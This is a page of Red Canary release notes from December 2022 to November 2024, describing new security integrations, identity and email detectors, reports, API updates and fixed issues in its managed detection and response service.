Red Canary Release Notes
    • 11 Dec 2024
    • 51 Minutes to read
    • PDF

    Red Canary Release Notes

    • PDF

    Article summary

    Note: This page does not include updates to the Linux EDR sensor. For information about updates the Linux EDR sensor, see the Linux EDR Sensor Release Notes page.

    November 2024

    New/Updated Features

    Red Canary Security Data Lake
    The new Security Data Lake product is a managed storage solution for Red Canary customers that offers cost-effective, long term storage for high volume security logs. With Security Data Lake you can store data as long as needed, retrieve data without the wait or fees imposed by traditional cold storage, and meet your log retention compliance requirements - all without the high storage costs of a SIEM or the expense of building an in-house data lake.

    Security Data Lake works with a wide range of security products, ingesting data from almost any log source that is line-delimited and can be written to an AWS S3 bucket or forwarded via syslog. For more information, see Getting Started with the Security Data Lake.

    CrowdStrike Falcon Identity Protection Integration
    Red Canary now supports CrowdStrike’s Falcon Identity Protection module. Detections impacting Entra ID, Office365, Okta, and traditional Active Directory deployments will be analyzed and investigated via flow investigations, minimizing false positive alerts, and surfacing threats against critical identity infrastructure. For more information, see Integrate CrowdStrike Falcon Identity Protection with Red Canary.

    Expanded Alert State Sync Options
    Red Canary now features more granular user control over which alerts are automatically closed in external alert sources, allowing you to further review the alert in your source platform if desired. You can separately enable state sync for different alert levels, or when a threat is published. We’ve also added a comment sync option to all Microsoft integrations, which adds comments to your source platform informing you of any work that Red Canary is doing on the alert. Finally, the audit log now tracks when alerts are closed due to state sync.

    This change applies to all Red Canary integrations that currently support state sync, including Microsoft Defender, Microsoft Sentinel, Microsoft Graph v2, CrowdStrike Falcon Insight EDR, Palo Alto Cortex XDR, and SentinelOne Singularity. For more information, see Synchronize Alert Status and Comments from Red Canary to Alert Platforms.

    New “Login Guard” Identity Detectors
    We’ve deployed the first of a new set of analytics which are intended to detect credential compromise for customers who use Entra ID or Okta. These detectors flag logins from ISPs or VPNs that differ from a user’s typical activity patterns, which is often a signal that the credentials are being used by someone other than their normal owner. When anomalous behavior is detected, the resulting events are subjected to Red Canary’s automated flow investigations, which cut down on false positives and add rich context to the threats before they’re published.

    Red Canary MDR on Palo Alto Networks Cortex XSIAM - Early Access
    In August, Red Canary signed a groundbreaking agreement with Palo Alto Networks to develop a Managed XSIAM service offering. We’re now thrilled to announce that our Early Access (EA) release is live and ready to onboard the first customers.

    For more information about the EA or GA phases of Red Canary MDR on XSIAM, please contact your Red Canary Customer Success Manager.

    Improved Support for International Time Zones in Automation
    The triggers in Red Canary’s Automation feature now use an expanded list of region-based time zones to better support our international customers and to create a consistent experience for customers in regions that observe Daylight Savings Time. These changes do not require any action on your part. All existing triggers will be automatically re-mapped to the new representation of the timezone. For example:

    MST "Mountain Time (US & Canada)" => "America/Denver"

    API Improvements
    We’ve improved the Threat Timeline API endpoint (/openapi/v3/detections/{id}/timeline) to include 14 new types of timeline content, bringing the API into alignment with the data already available in the Red Canary portal. The response now contains granular details for the following Threat Timeline categories:

    • Endpoint activity details

    • Process activity details

    • Correlated alert details

    • Network connection details

    • Analyst comments on activities

    • IP enrichment

    • Geolocation

    • Identity changes

    • Resource activity

    • Workload activity

    • Email activity

    • Login attempt

    • MFA challenges

    • User behaviors

    Note that this change is backwards compatible. Existing API calls will automatically contain the newly-supported information. See our API Documentation for a full list of the available Red Canary REST API resources.

    Fixed Issues

    State Sync
    We’ve resolved an issue that could cause alerts to be improperly reopened in certain circumstances.

    New Documentation

    October 2024

    New/Updated Features

    Threat Hunt Reports Page
    You can now view Threat Hunt Reports on a dedicated page in the Red Canary portal. Here are the highlights of this much-requested feature:

    • The reports contain full information about hunt strategy (how and what our Threat Hunting team looked for), what we observed, and our recommendations for mitigation

    • Newly-published reports will appear in the activity feed

    • You can easily distribute copies of the reports around your organization

    For more information, see Threat Hunt Reports.

    Trend Micro Vision One Integration
    Trend Micro Vision One support is now available in Red Canary to all customers with MDR Endpoint licensing. This feature-rich EDR integration includes:

    • EDR telemetry that enables threat detection on our vast library of detection analytics

    • Support for remediation response actions via Automate

    • Threat hunting capabilities

    • Alerts

    For more information, see the Trend Micro integration instructions.

    Red Canary Plugin for Microsoft Copilot for Security
    Our plugin for Microsoft Copilot - in preview since the Spring - has now been moved to GA. To learn more about how this plugin and partnership puts Red Canary on the cutting edge of delivering GenAI-enhanced MDR for Microsoft customers, read our blog post. For instructions and docs, check us out in Microsoft’s documentation. And if you want to see the source code, grab our Github repo.

    Integrations Page UI Changes
    We’ve made some improvements to the Integrations UI in Red Canary:

    • On the main Integrations page, the “Looking for something else?” link has been replaced with an easier-to-find “Add Integration” button

    • The Add Integration and Edit Integration pages now have clearer status icons and we’ve adjusted the location of the buttons to be consistent across all integration types

    New Documentation

    September 2024

    New/Updated Features

    Automatically Create Unwanted Software Exclusion Rules From Threats
    We’re making it easier to manage Unwanted Software threats. When a customer selects “I prefer not to see threats for this” for the Unwanted Software remediation state, an exclusion rule will be automatically created on the Applications page based on the selected criteria (endpoint, user, sensor group, etc.). This enhancement simplifies the workflow and removes the need for a separate step to create exclusions manually. For more information, see this page.

    New Reports Available in the Portal
    We’re excited to announce that two new reports are live! These data-driven reports are designed to help you better understand and showcase the value of Red Canary to your organization.

    • Top Observed Profiles Report: This report helps customers quantify the number of Intelligence Profile-associated threats to help justify security policies and measure trends over time. It includes two versions of the report: one focused on Tools and one focused on Groups. These reports are designed to provide insights into the threat landscape as it pertains to each organization, industry, and all of Red Canary customers.  

    • Integrations by the Numbers Report: This report provides detailed insight into how each integration contributes to Red Canary’s detection capabilities by tracking data collection, alerts ingested, and threats detected. Select up to two MDR-supported integrations to compare.

    Fixed Issues

    Analytic Matches Count for Identity and Cloud Events
    We’ve resolved an issue with the “By The Numbers” report, where Analytic Matches were not being counted for Identity or Cloud events, leading to discrepancies in match counts. This fix ensures that Analytic Matches are now accurately represented across all types. Customers may notice a positive increase in their match counts, reflecting a more precise view of Red Canary’s analytic capabilities.

    August 2024

    New/Updated Features

    Entra ID Telemetry Integration
    We’ve expanded our identity threat detection capabilities with the new Microsoft Entra ID integration. This integration allows us to access and analyze a broader range of Entra ID events in near real-time, enhancing your overall security visibility and response.

    Enhanced Okta Workforce Identity Telemetry Collection
    We’ve made significant improvements to our Okta Workforce Identity telemetry collection, providing more detailed and timely data to enhance your security posture. This upgrade ensures that your identity-related alerts are based on the most comprehensive and up-to-date information available.

    New Supported Sources for Red Canary Copilot Alert Summarization
    This feature helps you better understand the context of your alerts, provides recommendations for response, and highlights the critical data points that guided our investigation. Supported alert sources now include:

    • VMware Carbon Black Cloud Endpoint Standard

    • Crowdstrike Falcon Insight: EDR

    • Jamf

    • Microsoft ATP API Poll Alerts

    • Microsoft Defender for Identity v2

    • Microsoft Defender for Endpoint v2

    • Microsoft Entra ID Identity Protection v2

    • Palo Alto Networks Cortex XDR Alerts

    • Palo Alto Networks Threat Prevention

    • SentinelOne Singularity

    • Amazon GuardDuty

    • Fortinet FortiGate (NGFW)

    • Proofpoint Targeted Attack Protection (TAP)

    • Okta Workforce Identity

    Timeline Tabs for Threat Metadata
    We’ve introduced a new feature on the Threat timeline: Timeline Tabs. This enhancement provides you with a clearer and more organized view of your threat metadata. Each timeline entry now includes two clickable tabs:

    • Details Tab: This tab displays standard information, as well as additional Cloud Provider data such as process names and network IP addresses.

    • Location Tab: This tab stores metadata about where the threat occurred, including endpoint details, Kubernetes (K8s) info, container information, and cloud instance provider details.

    Ephemeral Server Counting Update
    Starting this month, we’re updating how we count ephemeral servers in heavily dynamic environments. Instead of counting every unique server, we’ll now calculate the server count based on a monthly average. This change applies to new Red Canary customers and those with a Cloud SKU, helping to prevent unexpected licensing overages.

    EDR Tenant Names on Hover
    We’ve introduced a simple popover feature that displays the name of the external service when you hover over the EDR logo to make it easier for customers with multiple EDRs of the same type. This update helps you quickly identify which tenant corresponds to each EDR instance.

    Precursor Labels
    Our Intelligence team has enhanced our ability to identify and communicate “precursor” activities - behaviors that often precede more serious threats like ransomware. By labeling these activities as precursors, we can provide more accurate threat assessments and better metrics on how often these activities escalate.

    Consolidated Retrospectives in Red Canary Readiness
    Readiness Exercises Retrospectives now have one unified feedback field and maturity dropdown per skill, rather than per discussion question. This consolidated experience enables teams to more effectively review and provide feedback to help them continuously improve their ability to respond.

    Fixed Issues

    Inactive Subdomains and Alert Backlog Handling
    We’ve changed the way Red Canary handles alerts for inactive subdomains to prevent backlogs and improve the timeliness of alert processing. Now, when a subdomain is reactivated, we will only process alerts from the time of reactivation forward, ensuring that old alerts are not processed.

    “Detected Threats” Report Fix
    We’ve fixed a bug in the calculation of the Median Time to Remediate (MTTR) in the “Detected Threats: How timely were we at remediating them?” report. The updated report now accurately reflects MTTR values and replaces the “-” value with “<1” when the calculated time is less than one day.

    New Documentation

    Support Center and Documentation Site Redesign
    We’re excited to announce the launch of our redesigned Red Canary Support Center and Documentation site! The new site separates product documentation from support ticketing and knowledge base articles, making it easier for you to find the information you need. Please update any bookmarks you have.

    July 2024

    New/Updated Features

    Alerts Timeline
    To improve activity display consistency in the Alerts timeline and resolve an issue with incorrect timestamps on some activities, some entries that previously appeared at the very end might now appear closer to the end (but with the correct timestamp).

    New Documentation

    June 2024

    New/Updated Features

    GenAI for Identity Flow Investigations
    We’ve introduced GenAI agent flows to help us evaluate large volumes of complicated alerts, make good decisions, and explain those decisions clearly. We’ve also tripled the number of alerts investigated as events, and our mean time to publish a threat has dropped by 60 percent without quality degradation. We now have both Guard Duty and Entra integrations using these new flow investigations. For more information, see Accelerating identity threat detection and response with GenAI.

    User and Entity Behavior Analytics (UEBA) Detectors
    For the first time in Red Canary’s history, we have detectors that use dynamically-populated prevalence indexes per subdomain, which means we can find activity unique to a particular user. These new user behavior detectors look for successful rare VPN, ISP, and device logins, based on what is normal in a user's environment.

    GenAI Alert Summarization Beta Launch
    We have a new BETA UI feature that summarizes an individual alert with everything we know or have done with that alert. This update backs up our investigation, offers suggested next steps, and is available in Red Canary to try right now. The following alert integrations are supported today:

    • Endpoint

      • Crowdstrike Falcon Insight: EDR

      • Microsoft Defender for Endpoint v2

      • Palo Alto Cortex XDR Alerts

      • SentinelOne Singularity

      • VMware Carbon Black Cloud Endpoint Standard

      • Jamf Pro/Protect

    • Identity

      • Microsoft EntraID Identity Protection v2

      • Microsoft Defender for Identity v2

    • Cloud

      • AWS GuardDuty

    Red Canary Copilot Integration with Microsoft’s Copilot
    Earlier this year we built a plugin for Microsoft’s Copilot and recently Microsoft released our plugin globally to all Microsoft Security Copilot customers.

    Threat Detection
    We’ve made the following improvements to our Threat Detection capabilities:

    • Six new intelligence profiles introduced, including Sugarghost, Cuckoo Stealer, Storm-1811, WARMCOOKIE, EditBot, and Cleanuploader.

    • Five new insights published, including the High Volume of ChromeLoader activity stemming from PDF Installer Lures, Open With Notepad: Protecting Users By Changing Default Behavior, and Voice phishing campaign leads to Black Basta.

    • Trend Micro EDR discovery and MVP translators have been completed. We can now generate tip-offs from Trend Micro EDR data.

    Readiness Exercise Improvements
    We’ve made the following improvements to our Readiness Exercises:

    • Updated two scenarios that include customizable fields and media prompts (“Are we ready for ransomware?” and “Compromised Third-Party Software”)

    • Added support for free-form attendee input during exercise set-up so that participants can be defined regardless of their subdomain user status

    • Added new readiness subdomain user roles to allow MDR and Readiness users more flexibility in managing users across the two products within the same subdomain

    • Introduced archiving and search for the Exercises and Action pages

    New Entra and Okta Data Standardization
    The Okta data has unblocked one detector, which searches for users attempting to access the Okta admin console.

    New Identity Enrichment
    We’ve added new identity enrichment fields to increase our ability to catch threats.

    New Email Detectors
    Three new email detectors are looking for suspicious activity in user email mailboxes.

    Fixed Issues

    Identity Tag UIUpdate
    Users can now create exclusions for identity tags. This update was a commonly requested feature enhancement that saves time so that identities don’t need to be individually excluded.

    New Documentation

    May 2024

    New/Updated Features

    Google Cloud Platform (GCP) Integration
    Integrate Google Cloud Platform (GCP) with Red Canary.

    New Documentation

    April 2024

    New/Updated Features

    MDR Detection Updates
    We’ve added the following new identity detectors:

    • ANY-LOGON-TOR
      This detector identifies any logon from a TOR node based on IP enrichment from the IP Quality Score.

    • IDENTITY-OKTA-MFA-TOR-LOGIN
      This detector identifies a successful MFA authentication sourcing from a TOR proxy IP address.

    • IDENTITY-LOGON-PERFECTDATA
      This detector identifies suspicious logins to the “PerfectData Software” Entra ID application, which may indicate a Business Email Compromise (BEC) attack.

    • IDENTITY-LOGON-EM-CLIENT
      This detector identifies suspicious logins to the “eM Client” Entra ID application, which may indicate a Business Email Compromise (BEC) attack.

    • EMAIL-RULE-CREATE-FRAUD-IP
      This detector identifies email rule creation from IP addresses associated with VPN/proxy services with a high fraud score according to IP enrichment data.

    More Okta Telemetry
    We’ve enhanced the standardization of logon attempt Okta event types and added the following new telemetry:

    • user.session.access_admin_app

    • user.session.start

    • user.authentication.auth_via_AD_agent

    • user.authentication.auth_via_IDP

    • user.authentication.auth_via_inbound_delauth

    • user.authentication.auth_via_inbound_SAML

    • user.authentication.auth_via_iwa

    • user.authentication.auth_via_LDAP_agent

    • user.authentication.auth_via_radius

    • user.authentication.auth_via_richclient

    • user.authentication.auth_via_social

    • user.authentication.authenticate

    • app.generic.unauth_app_access_attempt

    • Application.policy.sign_on.deny_access

    Threat Detection
    We’ve made the following improvements to our Threat Detection capabilities:

    • New intelligence profiles: We have three new profiles, ten new hints, and eight new detection coverage gap issues, including requests to bolster detection for 8base ransomware, RCRU64 ransomware, Koi Stealer, Bundlebo, D3F@CK loader, and XZ util sshd backdoor. The Intel Team researched the Koi Stealer and Loader malware, resulting in a new profile, a new hint, a detection coverage gap issue, and 11 new intelligence profile associations on threats.

    • Forty-nine new detectors are available across Google Cloud Platform (GCP), Windows, macOS, Linux, Identity and Email.

    Copilot for Security Plugin Available for Microsoft Customers
    Red Canary is the first MDR/MSSP to have a plugin published with Microsoft Security Copilot. We’ll also be the first plugin to ship with promptbooks that integrate our plugin capabilities to automate investigation tasks across the Microsoft Copilot for Security datasets. Users who own both Red Canary and Microsoft Copilot for Security can access their Red Canary data via Microsoft Security Copilot’s chatbot interface. Microsoft Security Copilot is a tool for defenders that helps them easily access and synthesize data from Red Canary while in the Defender console. The plugin is available today.

    Customizable Scenarios for Readiness Exercises
    Our Readiness Exercises now support customizable scenario inputs that you can specify during the exercise setup stage. These inputs are then used to create more realistic incident triggers that show actual employee names, roles, and company tools currently in place at your organization.

    New Documentation

    March 2024

    New/Updated Features

    LEDR Update
    We’ve added functionality to our Linux EDR sensor to show your more metadata related to the location of your Kubernetes pods and containers. This update helps you locate assets, leading to faster threat response times.

    More AWS telemetry
    We’ve extended the Software Asset Management (SAM) to support AWS telemetry around assumed roles, and a new translator was shipped to standardize this telemetry.

    More Cloud Metadata in Red Canary's automated emails
    The XDR team has added container-specific information to the emails that we send you via Automate, which helps streamline your response process for issues in your cloud environments.

    New Detectors
    We’ve deployed 44 new behavioral detectors.

    Fixed Issues

    Alert Timelines
    The XDR team fixed an issue where Alert Timeline entries were out of order.

    MDE Response Actions for Linux
    We’ve added isolation support for Linux users.

    Reporting Performance
    We’ve improved the Median Time to Remediation and Intelligence & Detection Engineering Reports. The reports previously took 7-12 seconds to load and now take just under 1 second.

    February 2024

    New/Updated Features

    Automated Response for Defender
    Red Canary now supports Automated response actions via Defender for Endpoint targeting MacOS and Linux systems. As a reminder, Red Canary Active Remediation does not currently support Linux on Defender or any sensor.

    New Documentation

    January 2024

    New/Updated Features

    Microsoft Azure Integration
    You can now integrate Red Canary with Microsoft Azure. For more information, see Integrate Microsoft Azure with Red Canary.

    UI Updates
    We’ve made the following improvements to the Red Canary UI:

    • New Intel Profile UI. Intelligence Profiles have officially converted from Early Access (EA) to General Availability.

    • New Status Checks UI. We have a new status check area that helps you know if your integrations are healthy, particularly if you have multiple integrations to monitor.

    • New User Protection Usage View. We’ve added a new view in Red Canary so you can can compare your User Protection usage against what you’ve purchased.

    • SentinelOne Pivot in Red Canary. All SentinelOne users can now pivot via DeepLink to an individual SentinelOne alert from the Red Canary alert page. This update addressed an issue where finding the source alert in SentinelOne from Red Canary was extremely difficult. Additionally, this update provides parity with other EDRs.

    New/Updated Detectors
    We’ve deployed 33 new behavioral detectors that span cloud and endpoint. We’ve also updated 47 existing detectors.

    Enhanced Automation
    We’ve enhanced our automation around multi-source threats, combining AADIP and MDE AITM alerts.

    Readiness Scenario Improvements
    We’ve added a new scenario for triaging a Microsoft SQL Brute Force attack. Additionally, we improved the flow in scenarios, including Atomic Red Team testing with prerequisites/ART guidance outlined in the scenario details section to ensure the team is prepared to exercise the scenario.

    Fixed Issues

    MDE Response Actions for MacOS (and soon Linux)
    We’ve added isolation support for MDE on MacOS, and are implementing Active Remediation (AR) support as well.

    New Documentation

    December 2023

    New Documentation

    November 2023

    New/Updated Features

    New Detectors
    We’ve developed and deployed thirty-six new detectors across AWS, Azure, Linux, MacOS, and Windows.

    New Intelligence Profile UI
    The new UI, available to Early Access users, features a more digestible presentation format so that we can continue to differentiate ourselves with our incredible Threat Intelligence content. The full GA release is set for early January.

    New Intelligence Profiles
    The Intelligence Team constantly updates our profiles based on the latest threats. This month, we added three new profiles and updated four existing profiles.

    New Scattered Spider Readiness Exercise
    We have a new readiness exercise to help our users prepare for one of today’s most challenging adversaries.

    Fixed Issues

    MDE Automate
    We’ve made several fixes to MDE’s Automate actions related to isolation, including Defender for Endpoint Isolation Cancellation. We also fixed an issue where users couldn’t cancel an isolation request for a device that was still pending isolation.

    New Documentation

    October 2023

    New/Updated Features

    New Intelligence Profiles
    The Intelligence Team created nine new Intelligence Profiles and updated fifteen Intelligence Profiles to provide additional threat context to our users. A notable new profile is Nitrogen, a malware family delivered via malvertising that often leads to follow-on activity.

    New Surveyor on Rails Tool
    The Threat Hunting Team recently released a new internal hunting tool called Surveyor on Rails. This tool allows our Threat Hunters to efficiently hunt across user environments as we investigate and seek to identify new threats. Surveyor on Rails has enabled the team to hunt across user environments in a fraction of the time that it used to.

    Wiz Update
    Red Canary has teamed up with Wiz as its first certified MDR partner. For more information, see our latest blog post on what’s coming up.

    Fixed Issues

    Automate On-demand Search
    We fixed an issue that prevented users from searching for the desired target to run an on-demand playbook against.

    Lacework Integration
    We’ve refactored the Lacework integration for improved reliability and performance.

    Portal SMS MFA
    Portal SMS MFA can now be disabled on a subdomain level.

    New Documentation

    September 2023

    New/Updated Features

    Thwarted Ransomware
    On 9/15/23 the night crew helped thwart a Ransomware attack against one of our users. One of our Detection Engineers saw suspicious usage of the bitsadmin tool and determined this threat was likely a “hands on keyboard” situation, and coordinated a call across threat hunting specialists here at Red Canary. Ultimately this threat was confirmed, blocked, and attributed to the ALPHV/BlackCat Ransomware affiliate.

    New Detectors
    Thirty-three new detectors were developed and deployed across Windows, MacOS, Linux, AWS, and Identity.  

    Readiness Exercises Updates
    We released ten new scenarios in the portal focused on Cloud and ICS readiness.

    Fixed Issues

    Forensics Package
    We addressed a known issue for users of this feature, as the forensic package required an overhaul for the majority of the EDRs for which we provide the capability. Users who have utilized the updated capabilities have reported a better experience.

    Microsoft Graph v2 Ingestion and Sync
    Due to a change in Microsoft’s data strategy we had to navigate a back office change with significant customer impact. We re-designed the way we ingest, delay, and queue data from Microsoft sources. This change improves the quality of data for these Microsoft products

    Report Loading Errors
    We fixed known issues with high endpoint count users that would previously error out. These include the Collections Report and the By The Number Report.

    New Documentation

    August 2023

    New/Updated Features

    Amazon Web Services (AWS) GuardDuty Integration
    You can now integrate Red Canary with Amazon Web Services (AWS) GuardDuty across all accounts and regions within your AWS Organization. This new integration lets Red Canary assume a role in your AWS environment, eliminating the need for a dedicated IAM user. In addition, Red Canary will detect when a new account or region appears, and automatically begin collecting GuardDuty findings. For more information, see Integrate Amazon Web Services with Red Canary.

    Data Is Column Added to the Integrations Table
    The integrations table now includes a Data Is column that describes the current status of your ingested data. This update gives you better insight into what Red Canary does with your data after ingestion.

    • Data will be stored and investigated
      Indicates that the data investigation has been assigned to Red Canary

    • Data will be stored
      Indicates that the data investigation has been assigned to the user

    For more information, see Integrations

    New Documentation

    July 2023

    New/Updated Features

    New Telemetry Added to Linux EDR sensor
    The Linux EDR sensor now collects Scriptload and file modification telemetry. Collecting these types of telemetry enables you to gain deeper insights into potential threats. For more information, see Release v1.5.0 and Release v1.5.1.

    • Scriptload Telemetry

      The Linux EDR sensor now collects the contents of scripts that start with a shebang (#!), ensuring we have granular visibility into script execution within environments protected by Linux EDR. With this valuable information, Red Canary identifies and analyzes potentially malicious scripts and detects script-based attacks.

    • File Modification Telemetry

      The Linux EDR sensor offers real-time visibility into any changes (creates, writes, deleters) made to critical system files. Red Canary quickly identifies unauthorized alterations and detects file-based attacks by capturing these modifications.

    With these enhanced telemetry capabilities, the Linux EDR sensor becomes an even more powerful ally in your security arsenal. This telemetry will be collected regardless of user subscription (CWP or Linux EDR).

    Fixed Issues

    Corrected Alert and Telemetry Information
    The Integrations page now shows the correct Alert and Telemetry information in the appropriate columns. This data provides insight on the amount and type of information that Red Canary is receiving from your third-party alert source. For more information, see Integrations.

    New Documentation

    June 2023

    New/Updated Features

    Integration UI Improvements
    The Red Canary Integration section is now easier to locate. From your Red Canary homepage, click Integrations to be taken to our main Integrations page. Start by typing in the name of your third-party security source, or scroll through the list to find the correct source. For more information, see Supported Integrations.

    New Events API Information
    Red Canary’s Events API now includes MITRE ATT&CK Tactics, Techniques, and Procedures (TTP) identifier information. You can easily extract TTP data, allowing you to discover what types of adversary motives and techniques your network is most vulnerable to, and security weaknesses that can be exploited.

    New Documentation

    May 2023

    New/Updated Features

    Automatically Close SentinelOne Alerts
    SentinelOne alerts now automatically close in Red Canary when they’ve been reviewed by Red Canary’s Cyber Incident Response Team (CIRT) team. The alert's status and any closing comments made by Red Canary will automatically update in the SentinelOne console. This update provides a consistent user experience between the two integrated platforms.

    Automatically Close Cortex Alerts
    Cortex alerts now automatically close in Red Canary when they’ve been reviewed by Red Canary’s CIRT team. The alert's status and any closing comments made by Red Canary will automatically update in the Cortex console. This provides a consistent user experience between the two integrated platforms.

    Additional Analyst Context for SentinelOne alerts
    Red Canary now automatically adds additional analyst context to SentinelOne alerts that have been reviewed by Red Canary’s CIRT team. Any notes made by Red Canary’s analysts during the review and disposition of a SentinelOne alert will now display as a Note attached to SentinelOne’s Incidents in the SentinelOne console. This update lets you see why an alert was given a disposition by the Red Canary team, further enhancing the clarity of Red Canary’s review.

    Remove Data Loss Prevention (DLP) Alerts from Microsoft Graph v2 Integrations
    Data Loss Prevention (DLP) alerts from Microsoft Graph v2 integrations will no longer be ingested by Red Canary. This alert source lacked sufficient security context for Red Canary to review and will require you to review future instances.

    SentinelOne Ban Binary Response Actions Standardized on SHA1 hashes.
    Red Canary's integration with SentinelOne for Ban Binary response actions now standardizes on SHA1 hashes. This update allows for the consistent banning of hashes when utilizing SentinelOne as an EDR platform. In addition, this update enables you to respond quickly to found threats.

    Adjust the Jamf Isolation Group for SOAR Response Actions
    Red Canary now allows you to adjust the Jamf Isolation group chosen for SOAR response actions with Jamf Pro. This update allows for quick updates to the Jamf integration while maintaining quality isolation outcomes.

    April 2023

    Changes

    Red Canary Readiness Launched
    We’ve launched Red Canary Readiness, a new portfolio of offerings that gives teams a whole new way to train and prepare for incidents. The initial Readiness product is Readiness Exercises, a first-of-its-kind continuous learning platform that delivers realistic training, tabletops, and atomic testing in a single unified experience. For more information, see Red Canary Readiness.

    New Request Remediation Button
    Red Canary has added a new Request Remediation button which enables on-demand requests for remediation on a published High or Medium severity Threat. The goal of this feature is to make it easier for you to seek additional support in instances where:

    • An endpoint was tagged incorrectly or you opted to not tag it due to isolation concerns

    • You acknowledged (AR stop) but then reconsidered and now want Active Remediation (AR) intervention

    • You removed the endpoint from the network and need a way to notify the Active Remediation team when it's back online

    • You’ve discussed the threat with our Threat Hunting team and are now comfortable with the Active Remediation actions

    • You need to request AR actions on an old threat (prior to tagging) that generates additional activity without a substantial update

    New Documentation

    Readiness:

    Active Remediation:

    Other:

    March 2023

    New/Updated Features

    SentinelOne Cloud Funnel 2.0 Integration
    Red Canary now supports SentinelOne’s latest data ingest mechanism, Cloud Funnel 2.0. With this upgrade, our new SentinelOne customers can easily set up and configure data integration with Red Canary using just a few pieces of information. This upgrade offers additional enrichment to XDR data from SentinelOne’s Singularity data lake streamed directly into Red Canary’s AWS S3 storage. An example of this is the inclusion of OsSource process data, which improves how Red Canary determines process lineage, resulting in increased detection coverage and investigative efficiency. We will automatically migrate all existing customers to this new mechanism over the next few weeks. For more information, see Integrate SentinelOne Cloud Funnel with Red Canary.

    Improved Azure AD Response Actions
    Azure AD response actions can now fire optionally without user approval and be triggered by alerts, not just detections. These changes expand the scope and increase the speed with which you can respond to threats impacting your users, thus decreasing the mean time to respond. This new update is especially beneficial if you’ve set up automation in Red Canary for Microsoft 365 Defender alerts. For more information, see Response Actions for Entra ID.

    Enhanced Linux EDR Sensor Script Loading
    The Linux EDR sensor now captures “shebang” script load information. If a process start invokes a “shebang” script (a file beginning with '#!'), the sensor now outputs information about that script’s content (currently limited to 1KB) as well as any middle interpreters of that script, in addition to the executable information.

    More Efficient Linux EDR Telemetry Searches
    Linux EDR customers can now hunt and interact with telemetry more efficiently. The search tool has been improved to make it easier for users to search while keeping the original search functionality for our experienced users. In addition, one of our new features enables you to easily specify date and time ranges within a search. Finally, a slide-out panel has been added to make it easier to view telemetry details.

    Threat Filtering Improvements
    Filtering for threats is now even more extensive with the new threat table matrix. You can now filter by up to ten attributes and the table order has been rearranged to make filtering and searching more intuitive. For more information, see Navigate Threats.

    New Documentation

    February 2023

    New/Updated Features

    Response Actions for Azure Active Directory (AzureAD).
    Red Canary now supports response actions for Azure Active Directory (AzureAD). Using Red Canary's updated playbook features, Threat Investigation customers can manually or automatically revoke session tokens, and suspend and unsuspend users. This new feature provides you with advanced remediation options to quickly respond to and stop threats. For more information, see Response Actions for Entra ID.

    Support for Palo Alto Cortex XQL
    Red Canary now utilizes Palo Alto Cortex XQL capabilities to retroactively search for developing threats in historical process telemetry, ensuring that Palo Alto Cortex customers are protected from the latest emerging threats as new attacker IOCs are identified.

    New Documentation

    January 2023

    New/Updated Features

    Microsoft Defender for Cloud Integration
    Red Canary now supports MDR for Microsoft Defender for Cloud. Defender for Cloud enables you to continually assess, secure, and defend your Azure, AWS, and Google Cloud Platform infrastructure. Red Canary assesses Defender for Cloud alerts and threats that are correlated to other threats and alerts in your cloud environment. For more information, see Integrate Microsoft Defender for Cloud with Red Canary.

    Lacework Polygraph Integration
    Red Canary now supports MDR for Lacework. Lacework looks for abnormal behavior rather than using a strict rules-based analytics approach. As such, there can be higher false positives in Lacework, but this approach can be more flexible to changing threats in your cloud environment. Red Canary monitors Lacework alerts for threats and correlates this telemetry to other threats and alerts in your cloud environment. Today, Red Canary is focused on detecting active (post compromise) threats in your environment, and in the near future we’ll be able to help you identify and respond to critical misconfigurations as well. For more information, see Integrate Lacework Polygraph with Red Canary.

    Expanded Content and Filter Options on Activity Feed
    We have expanded the content and filter options on the Activity Feed to include Intelligence Profiles. Red Canary develops Profiles to help describe threats and summarize their associated behaviors. You can now have your Activity Feed inform you when Red Canary publishes new Intelligence Profiles.

    Automation Action for Endpoint Reporting Tags
    You can now create an automation action to apply reporting tags to endpoints. Reporting tags allow you to add additional metadata to help organize and categorize endpoints within your environment. This feature enables you to automatically apply existing or new tags to endpoints based on an endpoint trigger event. When an endpoint changes statuses or exceeds a last check-in time threshold, you can immediately apply relevant tags to help manage the endpoints without human intervention.

    API Updated to Allow Threat Remediation as TEST
    We have updated our API to reflect that Threats can be remediated as TEST. Although the Red Canary platform offered four options for not resolving threats, the API only had three. We added not_remediated_authorized_testing to our API to match the content found in the platform, so you can now choose not to remediate the threat and mark it as “This was testing” for clarification.

    Microsoft Sentinel Integration Expanded with SIEM
    We’ve expanded our integration with Microsoft Sentinel to harness the power of SIEM (Security Information and Event Management) for threat detection and response. Red Canary integrates with Microsoft Sentinel incidents generated from Microsoft’s built-in analytics. By ingesting and reviewing your Microsoft incidents, Red Canary can help protect against identity-based threats, improve your cloud security coverage, and operationalize more of Microsoft’s security tools. For integration directions, see Integrate Microsoft Sentinel with Red Canary.

    CrowdStrike Endpoint Logon Telemetry
    Red Canary now supports MDR for CrowdStrike endpoint logon telemetry for all CrowdStrike EDR customers. Red Canary ingests, normalizes, and investigates device logon telemetry from CrowdStrike Falcon agents. This new visibility means Red Canary can detect brute force and other identity based threats using the CrowdStrike agents that customers have deployed in their environment. For more information, see Identity detection support for CrowdStrike EDR.

    Improved Handling for Microsoft Sentinel Incidents
    You can now verify Red Canary’s handling of Microsoft Sentinel incidents. When Red Canary publishes a threat related to a Microsoft Sentinel incident, you’ll see a comment in Red Canary on the incident in Microsoft Sentinel with a link to the published threat in Red Canary. This update enables you to easily pivot from Microsoft Sentinel to Red Canary and verify that Red Canary is investigating your Microsoft Sentinel Incidents.

    Industry News Section Added to Intelligence Products
    We have expanded our Intelligence Products by adding Industry News as its own section. The Red Canary Intelligence team reviews and curates the latest cybersecurity news that is relevant. This new page keeps you abreast of emerging and prevalent threats, allowing you to make informed decisions regarding your security posture. Check out Intelligence Products for more information.

    New Documentation

    New Videos

    December 2022

    New/Updated Features

    • You can now protect your Google Workspace with Red Canary MDR. Google Workspace (formerly known as G Suite) includes Gmail, Sheets, Drive, Docs, and many other productivity tools. Gmail is a critically important tool to protect, and Red Canary has stepped up as an MDR partner to protect the entire Google Workspace suite. Our integration collects telemetry and alert data from the entire Google Workspace productivity suite, giving the Red Canary team better visibility into potential threats in your environment. For more information, see Integrate Google Workspace with Red Canary.

    • Our new PDF and report subscriptions feature enables you to track the impact and effectiveness of your security operations program. Reports can now be saved to PDF format, which matches what is displayed in Red Canary. Reports can also be executed on a schedule (weekly, monthly, quarterly, etc) and distributed via email with a PDF attachment. For more information, see View Reports.

